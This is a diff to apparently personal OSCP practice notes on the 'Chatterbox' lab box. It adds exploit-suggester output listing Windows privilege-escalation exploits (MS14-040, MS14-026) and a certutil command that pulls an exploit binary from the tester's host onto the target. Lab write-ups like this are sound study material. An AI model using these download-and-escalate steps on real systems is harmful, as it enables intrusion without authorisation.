--- a/docs/OSCP practice exam/2. Chatterbox.md
+++ b/docs/OSCP practice exam/2. Chatterbox.md
@@ -289,5 +289,24 @@ copy WinPEAS to target.
 certutil.exe -urlcache -f http://10.10.16.4:80/winPEASx86.exe wp.exe
 ```
 
+### WinPEAS findings:
+
+![[Pasted image 20220203232007.png]]
+
+Nothing else really cool in WinPEAS - guess I should try exploit suggester. Here are the **local**, **non-metasploit**, exploits.
+
+```text
+[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
+	[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
+	[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
+	[*]
+[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
+	[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
+```
+
+
 ## PrivEsc
 
+```cmd
+certutil.exe -urlcache -f http://10.10.16.4:80/MS14-40-x86.exe pe.exe
+```
